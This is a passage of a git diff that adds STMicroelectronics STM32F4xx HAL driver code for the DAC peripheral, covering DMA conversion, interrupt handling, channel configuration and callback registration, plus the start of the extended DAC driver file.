Peripheral */ + __HAL_DAC_DISABLE(hdac, Channel); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Enables DAC and starts conversion of channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to DAC peripheral + * @param Alignment Specifies the data alignment for DAC channel. + * This parameter can be one of the following values: + * @arg DAC_ALIGN_8B_R: 8bit right data alignment selected + * @arg DAC_ALIGN_12B_L: 12bit left data alignment selected + * @arg DAC_ALIGN_12B_R: 12bit right data alignment selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_Start_DMA(DAC_HandleTypeDef *hdac, uint32_t Channel, uint32_t *pData, uint32_t Length, + uint32_t Alignment) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + assert_param(IS_DAC_ALIGN(Alignment)); + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + if (Channel == DAC_CHANNEL_1) + { + /* Set the DMA transfer complete callback for channel1 */ + hdac->DMA_Handle1->XferCpltCallback = DAC_DMAConvCpltCh1; + + /* Set the DMA half transfer complete callback for channel1 */ + hdac->DMA_Handle1->XferHalfCpltCallback = DAC_DMAHalfConvCpltCh1; + + /* Set the DMA error callback for channel1 */ + hdac->DMA_Handle1->XferErrorCallback = DAC_DMAErrorCh1; + + /* Enable the selected DAC channel1 DMA request */ + SET_BIT(hdac->Instance->CR, DAC_CR_DMAEN1); + + /* Case of use of channel 1 */ + switch (Alignment) + { + case DAC_ALIGN_12B_R: + /* Get DHR12R1 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR12R1; + break; + case DAC_ALIGN_12B_L: + /* Get DHR12L1 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR12L1; + break; + case DAC_ALIGN_8B_R: + /* Get DHR8R1 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR8R1; + break; + default: + break; + } + } +#if defined(DAC_CHANNEL2_SUPPORT) + else + { + /* Set the DMA transfer complete callback for channel2 */ + hdac->DMA_Handle2->XferCpltCallback = DAC_DMAConvCpltCh2; + + /* Set the DMA half transfer complete callback for channel2 */ + hdac->DMA_Handle2->XferHalfCpltCallback = DAC_DMAHalfConvCpltCh2; + + /* Set the DMA error callback for channel2 */ + hdac->DMA_Handle2->XferErrorCallback = DAC_DMAErrorCh2; + + /* Enable the selected DAC channel2 DMA request */ + SET_BIT(hdac->Instance->CR, DAC_CR_DMAEN2); + + /* Case of use of channel 2 */ + switch (Alignment) + { + case DAC_ALIGN_12B_R: + /* Get DHR12R2 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR12R2; + break; + case DAC_ALIGN_12B_L: + /* Get DHR12L2 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR12L2; + break; + case DAC_ALIGN_8B_R: + /* Get DHR8R2 address */ + tmpreg = (uint32_t)&hdac->Instance->DHR8R2; + break; + default: + break; + } + } +#endif /* DAC_CHANNEL2_SUPPORT */ + + /* Enable the DMA Stream */ + if (Channel == DAC_CHANNEL_1) + { + /* Enable the DAC DMA underrun interrupt */ + __HAL_DAC_ENABLE_IT(hdac, DAC_IT_DMAUDR1); + + /* Enable the DMA Stream */ + status = HAL_DMA_Start_IT(hdac->DMA_Handle1, (uint32_t)pData, tmpreg, Length); + } +#if defined(DAC_CHANNEL2_SUPPORT) + else + { + /* Enable the DAC DMA underrun interrupt */ + __HAL_DAC_ENABLE_IT(hdac, DAC_IT_DMAUDR2); + + /* Enable the DMA Stream */ + status = HAL_DMA_Start_IT(hdac->DMA_Handle2, (uint32_t)pData, tmpreg, Length); + } +#endif /* DAC_CHANNEL2_SUPPORT */ + + /* Process Unlocked */ + __HAL_UNLOCK(hdac); + + if (status == HAL_OK) + { + /* Enable the Peripheral */ + __HAL_DAC_ENABLE(hdac, Channel); + } + else + { + hdac->ErrorCode |= HAL_DAC_ERROR_DMA; + } + + /* Return function status */ + return status; +} + +/** + * @brief Disables DAC and stop conversion of channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_Stop_DMA(DAC_HandleTypeDef *hdac, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + + /* Disable the selected DAC channel DMA request */ + hdac->Instance->CR &= ~(DAC_CR_DMAEN1 << (Channel & 0x10UL)); + + /* Disable the Peripheral */ + __HAL_DAC_DISABLE(hdac, Channel); + + /* Disable the DMA Stream */ + + /* Channel1 is used */ + if (Channel == DAC_CHANNEL_1) + { + /* Disable the DMA Stream */ + (void)HAL_DMA_Abort(hdac->DMA_Handle1); + + /* Disable the DAC DMA underrun interrupt */ + __HAL_DAC_DISABLE_IT(hdac, DAC_IT_DMAUDR1); + } +#if defined(DAC_CHANNEL2_SUPPORT) + else /* Channel2 is used for */ + { + /* Disable the DMA Stream */ + (void)HAL_DMA_Abort(hdac->DMA_Handle2); + + /* Disable the DAC DMA underrun interrupt */ + __HAL_DAC_DISABLE_IT(hdac, DAC_IT_DMAUDR2); + } +#endif /* DAC_CHANNEL2_SUPPORT */ + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Handles DAC interrupt request + * This function uses the interruption of DMA + * underrun. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +void HAL_DAC_IRQHandler(DAC_HandleTypeDef *hdac) +{ + if (__HAL_DAC_GET_IT_SOURCE(hdac, DAC_IT_DMAUDR1)) + { + /* Check underrun flag of DAC channel 1 */ + if (__HAL_DAC_GET_FLAG(hdac, DAC_FLAG_DMAUDR1)) + { + /* Change DAC state to error state */ + hdac->State = HAL_DAC_STATE_ERROR; + + /* Set DAC error code to channel1 DMA underrun error */ + SET_BIT(hdac->ErrorCode, HAL_DAC_ERROR_DMAUNDERRUNCH1); + + /* Clear the underrun flag */ + __HAL_DAC_CLEAR_FLAG(hdac, DAC_FLAG_DMAUDR1); + + /* Disable the selected DAC channel1 DMA request */ + CLEAR_BIT(hdac->Instance->CR, DAC_CR_DMAEN1); + + /* Error callback */ +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->DMAUnderrunCallbackCh1(hdac); +#else + HAL_DAC_DMAUnderrunCallbackCh1(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + } + } + +#if defined(DAC_CHANNEL2_SUPPORT) + if (__HAL_DAC_GET_IT_SOURCE(hdac, DAC_IT_DMAUDR2)) + { + /* Check underrun flag of DAC channel 2 */ + if (__HAL_DAC_GET_FLAG(hdac, DAC_FLAG_DMAUDR2)) + { + /* Change DAC state to error state */ + hdac->State = HAL_DAC_STATE_ERROR; + + /* Set DAC error code to channel2 DMA underrun error */ + SET_BIT(hdac->ErrorCode, HAL_DAC_ERROR_DMAUNDERRUNCH2); + + /* Clear the underrun flag */ + __HAL_DAC_CLEAR_FLAG(hdac, DAC_FLAG_DMAUDR2); + + /* Disable the selected DAC channel2 DMA request */ + CLEAR_BIT(hdac->Instance->CR, DAC_CR_DMAEN2); + + /* Error callback */ +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->DMAUnderrunCallbackCh2(hdac); +#else + HAL_DACEx_DMAUnderrunCallbackCh2(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + } + } +#endif /* DAC_CHANNEL2_SUPPORT */ +} + +/** + * @brief Set the specified data holding register value for DAC channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @param Alignment Specifies the data alignment. + * This parameter can be one of the following values: + * @arg DAC_ALIGN_8B_R: 8bit right data alignment selected + * @arg DAC_ALIGN_12B_L: 12bit left data alignment selected + * @arg DAC_ALIGN_12B_R: 12bit right data alignment selected + * @param Data Data to be loaded in the selected data holding register. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_SetValue(DAC_HandleTypeDef *hdac, uint32_t Channel, uint32_t Alignment, uint32_t Data) +{ + __IO uint32_t tmp = 0UL; + + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + assert_param(IS_DAC_ALIGN(Alignment)); + assert_param(IS_DAC_DATA(Data)); + + tmp = (uint32_t)hdac->Instance; + if (Channel == DAC_CHANNEL_1) + { + tmp += DAC_DHR12R1_ALIGNMENT(Alignment); + } +#if defined(DAC_CHANNEL2_SUPPORT) + else + { + tmp += DAC_DHR12R2_ALIGNMENT(Alignment); + } +#endif /* DAC_CHANNEL2_SUPPORT */ + + /* Set the DAC channel selected data holding register */ + *(__IO uint32_t *) tmp = Data; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Conversion complete callback in non-blocking mode for Channel1 + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_ConvCpltCallbackCh1(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_ConvCpltCallbackCh1 could be implemented in the user file + */ +} + +/** + * @brief Conversion half DMA transfer callback in non-blocking mode for Channel1 + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_ConvHalfCpltCallbackCh1(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_ConvHalfCpltCallbackCh1 could be implemented in the user file + */ +} + +/** + * @brief Error DAC callback for Channel1. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_ErrorCallbackCh1(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_ErrorCallbackCh1 could be implemented in the user file + */ +} + +/** + * @brief DMA underrun DAC callback for channel1. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DAC_DMAUnderrunCallbackCh1(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DAC_DMAUnderrunCallbackCh1 could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup DAC_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Configure channels. + (+) Set the specified data holding register value for DAC channel. + +@endverbatim + * @{ + */ + +/** + * @brief Returns the last data output value of the selected DAC channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @retval The selected DAC channel data output value. + */ +uint32_t HAL_DAC_GetValue(DAC_HandleTypeDef *hdac, uint32_t Channel) +{ + uint32_t result = 0; + + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + + if (Channel == DAC_CHANNEL_1) + { + result = hdac->Instance->DOR1; + } +#if defined(DAC_CHANNEL2_SUPPORT) + else + { + result = hdac->Instance->DOR2; + } +#endif /* DAC_CHANNEL2_SUPPORT */ + /* Returns the DAC channel data output register value */ + return result; +} + +/** + * @brief Configures the selected DAC channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param sConfig DAC configuration structure. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DAC_ConfigChannel(DAC_HandleTypeDef *hdac, DAC_ChannelConfTypeDef *sConfig, uint32_t Channel) +{ + uint32_t tmpreg1; + uint32_t tmpreg2; + + /* Check the DAC parameters */ + assert_param(IS_DAC_TRIGGER(sConfig->DAC_Trigger)); + assert_param(IS_DAC_OUTPUT_BUFFER_STATE(sConfig->DAC_OutputBuffer)); + assert_param(IS_DAC_CHANNEL(Channel)); + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Get the DAC CR value */ + tmpreg1 = hdac->Instance->CR; + /* Clear BOFFx, TENx, TSELx, WAVEx and MAMPx bits */ + tmpreg1 &= ~(((uint32_t)(DAC_CR_MAMP1 | DAC_CR_WAVE1 | DAC_CR_TSEL1 | DAC_CR_TEN1 | DAC_CR_BOFF1)) << (Channel & 0x10UL)); + /* Configure for the selected DAC channel: buffer output, trigger */ + /* Set TSELx and TENx bits according to DAC_Trigger value */ + /* Set BOFFx bit according to DAC_OutputBuffer value */ + tmpreg2 = (sConfig->DAC_Trigger | sConfig->DAC_OutputBuffer); + /* Calculate CR register value depending on DAC_Channel */ + tmpreg1 |= tmpreg2 << (Channel & 0x10UL); + /* Write to DAC CR */ + hdac->Instance->CR = tmpreg1; + /* Disable wave generation */ + CLEAR_BIT(hdac->Instance->CR, (DAC_CR_WAVE1 << (Channel & 0x10UL))); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup DAC_Exported_Functions_Group4 Peripheral State and Errors functions + * @brief Peripheral State and Errors functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Errors functions ##### + ============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the DAC state. + (+) Check the DAC Errors. + +@endverbatim + * @{ + */ + +/** + * @brief return the DAC handle state + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval HAL state + */ +HAL_DAC_StateTypeDef HAL_DAC_GetState(DAC_HandleTypeDef *hdac) +{ + /* Return DAC handle state */ + return hdac->State; +} + + +/** + * @brief Return the DAC error code + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval DAC Error Code + */ +uint32_t HAL_DAC_GetError(DAC_HandleTypeDef *hdac) +{ + return hdac->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup DAC_Exported_Functions + * @{ + */ + +/** @addtogroup DAC_Exported_Functions_Group1 + * @{ + */ +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User DAC Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hdac DAC handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_DAC_ERROR_INVALID_CALLBACK DAC Error Callback ID + * @arg @ref HAL_DAC_CH1_COMPLETE_CB_ID DAC CH1 Complete Callback ID + * @arg @ref HAL_DAC_CH1_HALF_COMPLETE_CB_ID DAC CH1 Half Complete Callback ID + * @arg @ref HAL_DAC_CH1_ERROR_ID DAC CH1 Error Callback ID + * @arg @ref HAL_DAC_CH1_UNDERRUN_CB_ID DAC CH1 UnderRun Callback ID + * @arg @ref HAL_DAC_CH2_COMPLETE_CB_ID DAC CH2 Complete Callback ID + * @arg @ref HAL_DAC_CH2_HALF_COMPLETE_CB_ID DAC CH2 Half Complete Callback ID + * @arg @ref HAL_DAC_CH2_ERROR_ID DAC CH2 Error Callback ID + * @arg @ref HAL_DAC_CH2_UNDERRUN_CB_ID DAC CH2 UnderRun Callback ID + * @arg @ref HAL_DAC_MSPINIT_CB_ID DAC MSP Init Callback ID + * @arg @ref HAL_DAC_MSPDEINIT_CB_ID DAC MSP DeInit Callback ID + * + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_DAC_RegisterCallback(DAC_HandleTypeDef *hdac, HAL_DAC_CallbackIDTypeDef CallbackID, + pDAC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hdac); + + if (hdac->State == HAL_DAC_STATE_READY) + { + switch (CallbackID) + { + case HAL_DAC_CH1_COMPLETE_CB_ID : + hdac->ConvCpltCallbackCh1 = pCallback; + break; + case HAL_DAC_CH1_HALF_COMPLETE_CB_ID : + hdac->ConvHalfCpltCallbackCh1 = pCallback; + break; + case HAL_DAC_CH1_ERROR_ID : + hdac->ErrorCallbackCh1 = pCallback; + break; + case HAL_DAC_CH1_UNDERRUN_CB_ID : + hdac->DMAUnderrunCallbackCh1 = pCallback; + break; +#if defined(DAC_CHANNEL2_SUPPORT) + case HAL_DAC_CH2_COMPLETE_CB_ID : + hdac->ConvCpltCallbackCh2 = pCallback; + break; + case HAL_DAC_CH2_HALF_COMPLETE_CB_ID : + hdac->ConvHalfCpltCallbackCh2 = pCallback; + break; + case HAL_DAC_CH2_ERROR_ID : + hdac->ErrorCallbackCh2 = pCallback; + break; + case HAL_DAC_CH2_UNDERRUN_CB_ID : + hdac->DMAUnderrunCallbackCh2 = pCallback; + break; +#endif /* DAC_CHANNEL2_SUPPORT */ + case HAL_DAC_MSPINIT_CB_ID : + hdac->MspInitCallback = pCallback; + break; + case HAL_DAC_MSPDEINIT_CB_ID : + hdac->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hdac->State == HAL_DAC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DAC_MSPINIT_CB_ID : + hdac->MspInitCallback = pCallback; + break; + case HAL_DAC_MSPDEINIT_CB_ID : + hdac->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdac); + return status; +} + +/** + * @brief Unregister a User DAC Callback + * DAC Callback is redirected to the weak (surcharged) predefined callback + * @param hdac DAC handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_DAC_CH1_COMPLETE_CB_ID DAC CH1 transfer Complete Callback ID + * @arg @ref HAL_DAC_CH1_HALF_COMPLETE_CB_ID DAC CH1 Half Complete Callback ID + * @arg @ref HAL_DAC_CH1_ERROR_ID DAC CH1 Error Callback ID + * @arg @ref HAL_DAC_CH1_UNDERRUN_CB_ID DAC CH1 UnderRun Callback ID + * @arg @ref HAL_DAC_CH2_COMPLETE_CB_ID DAC CH2 Complete Callback ID + * @arg @ref HAL_DAC_CH2_HALF_COMPLETE_CB_ID DAC CH2 Half Complete Callback ID + * @arg @ref HAL_DAC_CH2_ERROR_ID DAC CH2 Error Callback ID + * @arg @ref HAL_DAC_CH2_UNDERRUN_CB_ID DAC CH2 UnderRun Callback ID + * @arg @ref HAL_DAC_MSPINIT_CB_ID DAC MSP Init Callback ID + * @arg @ref HAL_DAC_MSPDEINIT_CB_ID DAC MSP DeInit Callback ID + * @arg @ref HAL_DAC_ALL_CB_ID DAC All callbacks + * @retval status + */ +HAL_StatusTypeDef HAL_DAC_UnRegisterCallback(DAC_HandleTypeDef *hdac, HAL_DAC_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdac); + + if (hdac->State == HAL_DAC_STATE_READY) + { + switch (CallbackID) + { + case HAL_DAC_CH1_COMPLETE_CB_ID : + hdac->ConvCpltCallbackCh1 = HAL_DAC_ConvCpltCallbackCh1; + break; + case HAL_DAC_CH1_HALF_COMPLETE_CB_ID : + hdac->ConvHalfCpltCallbackCh1 = HAL_DAC_ConvHalfCpltCallbackCh1; + break; + case HAL_DAC_CH1_ERROR_ID : + hdac->ErrorCallbackCh1 = HAL_DAC_ErrorCallbackCh1; + break; + case HAL_DAC_CH1_UNDERRUN_CB_ID : + hdac->DMAUnderrunCallbackCh1 = HAL_DAC_DMAUnderrunCallbackCh1; + break; +#if defined(DAC_CHANNEL2_SUPPORT) + case HAL_DAC_CH2_COMPLETE_CB_ID : + hdac->ConvCpltCallbackCh2 = HAL_DACEx_ConvCpltCallbackCh2; + break; + case HAL_DAC_CH2_HALF_COMPLETE_CB_ID : + hdac->ConvHalfCpltCallbackCh2 = HAL_DACEx_ConvHalfCpltCallbackCh2; + break; + case HAL_DAC_CH2_ERROR_ID : + hdac->ErrorCallbackCh2 = HAL_DACEx_ErrorCallbackCh2; + break; + case HAL_DAC_CH2_UNDERRUN_CB_ID : + hdac->DMAUnderrunCallbackCh2 = HAL_DACEx_DMAUnderrunCallbackCh2; + break; +#endif /* DAC_CHANNEL2_SUPPORT */ + case HAL_DAC_MSPINIT_CB_ID : + hdac->MspInitCallback = HAL_DAC_MspInit; + break; + case HAL_DAC_MSPDEINIT_CB_ID : + hdac->MspDeInitCallback = HAL_DAC_MspDeInit; + break; + case HAL_DAC_ALL_CB_ID : + hdac->ConvCpltCallbackCh1 = HAL_DAC_ConvCpltCallbackCh1; + hdac->ConvHalfCpltCallbackCh1 = HAL_DAC_ConvHalfCpltCallbackCh1; + hdac->ErrorCallbackCh1 = HAL_DAC_ErrorCallbackCh1; + hdac->DMAUnderrunCallbackCh1 = HAL_DAC_DMAUnderrunCallbackCh1; +#if defined(DAC_CHANNEL2_SUPPORT) + hdac->ConvCpltCallbackCh2 = HAL_DACEx_ConvCpltCallbackCh2; + hdac->ConvHalfCpltCallbackCh2 = HAL_DACEx_ConvHalfCpltCallbackCh2; + hdac->ErrorCallbackCh2 = HAL_DACEx_ErrorCallbackCh2; + hdac->DMAUnderrunCallbackCh2 = HAL_DACEx_DMAUnderrunCallbackCh2; +#endif /* DAC_CHANNEL2_SUPPORT */ + hdac->MspInitCallback = HAL_DAC_MspInit; + hdac->MspDeInitCallback = HAL_DAC_MspDeInit; + break; + default : + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hdac->State == HAL_DAC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DAC_MSPINIT_CB_ID : + hdac->MspInitCallback = HAL_DAC_MspInit; + break; + case HAL_DAC_MSPDEINIT_CB_ID : + hdac->MspDeInitCallback = HAL_DAC_MspDeInit; + break; + default : + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdac->ErrorCode |= HAL_DAC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdac); + return status; +} +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup DAC_Private_Functions + * @{ + */ + +/** + * @brief DMA conversion complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAConvCpltCh1(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ConvCpltCallbackCh1(hdac); +#else + HAL_DAC_ConvCpltCallbackCh1(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + hdac->State = HAL_DAC_STATE_READY; +} + +/** + * @brief DMA half transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAHalfConvCpltCh1(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* Conversion complete callback */ +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ConvHalfCpltCallbackCh1(hdac); +#else + HAL_DAC_ConvHalfCpltCallbackCh1(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA error callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAErrorCh1(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Set DAC error code to DMA error */ + hdac->ErrorCode |= HAL_DAC_ERROR_DMA; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ErrorCallbackCh1(hdac); +#else + HAL_DAC_ErrorCallbackCh1(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + hdac->State = HAL_DAC_STATE_READY; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* DAC */ + +#endif /* HAL_DAC_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac_ex.c new file mode 100644 index 000000000..4a05998fe --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dac_ex.c @@ -0,0 +1,496 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dac_ex.c + * @author MCD Application Team + * @brief Extended DAC HAL module driver. + * This file provides firmware functions to manage the extended + * functionalities of the DAC peripheral. + * + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + + *** Dual mode IO operation *** + ============================== + [..] + (+) When Dual mode is enabled (i.e. DAC Channel1 and Channel2 are used simultaneously) : + Use HAL_DACEx_DualGetValue() to get digital data to be converted and use + HAL_DACEx_DualSetValue() to set digital value to converted simultaneously in + Channel 1 and Channel 2. + + *** Signal generation operation *** + =================================== + [..] + (+) Use HAL_DACEx_TriangleWaveGenerate() to generate Triangle signal. + (+) Use HAL_DACEx_NoiseWaveGenerate() to generate Noise signal. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_DAC_MODULE_ENABLED + +#if defined(DAC) + +/** @defgroup DACEx DACEx + * @brief DAC Extended HAL module driver + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup DACEx_Exported_Functions DACEx Exported Functions + * @{ + */ + +/** @defgroup DACEx_Exported_Functions_Group2 IO operation functions + * @brief Extended IO operation functions + * +@verbatim + ============================================================================== + ##### Extended features functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Start conversion. + (+) Stop conversion. + (+) Start conversion and enable DMA transfer. + (+) Stop conversion and disable DMA transfer. + (+) Get result of conversion. + (+) Get result of dual mode conversion. + +@endverbatim + * @{ + */ + +#if defined(DAC_CHANNEL2_SUPPORT) +/** + * @brief Enables DAC and starts conversion of both channels. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DACEx_DualStart(DAC_HandleTypeDef *hdac) +{ + uint32_t tmp_swtrig = 0UL; + + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Enable the Peripheral */ + __HAL_DAC_ENABLE(hdac, DAC_CHANNEL_1); + __HAL_DAC_ENABLE(hdac, DAC_CHANNEL_2); + + /* Check if software trigger enabled */ + if ((hdac->Instance->CR & (DAC_CR_TEN1 | DAC_CR_TSEL1)) == DAC_TRIGGER_SOFTWARE) + { + tmp_swtrig |= DAC_SWTRIGR_SWTRIG1; + } + if ((hdac->Instance->CR & (DAC_CR_TEN2 | DAC_CR_TSEL2)) == (DAC_TRIGGER_SOFTWARE << 